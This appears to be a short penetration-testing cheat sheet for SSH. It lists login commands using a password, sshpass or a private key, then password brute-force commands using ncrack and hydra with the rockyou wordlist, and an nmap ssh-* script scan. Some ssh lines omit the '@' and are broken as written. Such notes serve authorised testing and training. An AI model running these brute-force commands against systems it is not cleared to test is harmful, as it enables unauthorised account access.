Skip to content

22 - Pentesting SSH

ssh with password

ssh <user-name>$(target)

ssh with password

sshpass -p pass123 ssh <user-name>@$(target)

ssh with key

chmod 400 id_rsa
ssh -i id_rsa <user-name>$(target)
ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i id_rsa <user-name>@$(target)

ncrack

ncrack -v -U /home/tmp/users.txt -P /usr/share/wordlists/rockyou.txt ssh://$(target):22
ncrack -v --user root -P /usr/share/wordlists/rockyou.txt ssh://$(target):22

hydra

hydra -l user-name -P /usr/share/wordlists/rockyou.txt ssh://$(target) -I -F
hydra -l administrator -P /usr/share/wordlists/rockyou.txt -vV $(target) ssh

nmap

nmap -p 22 --script=ssh-* $(target)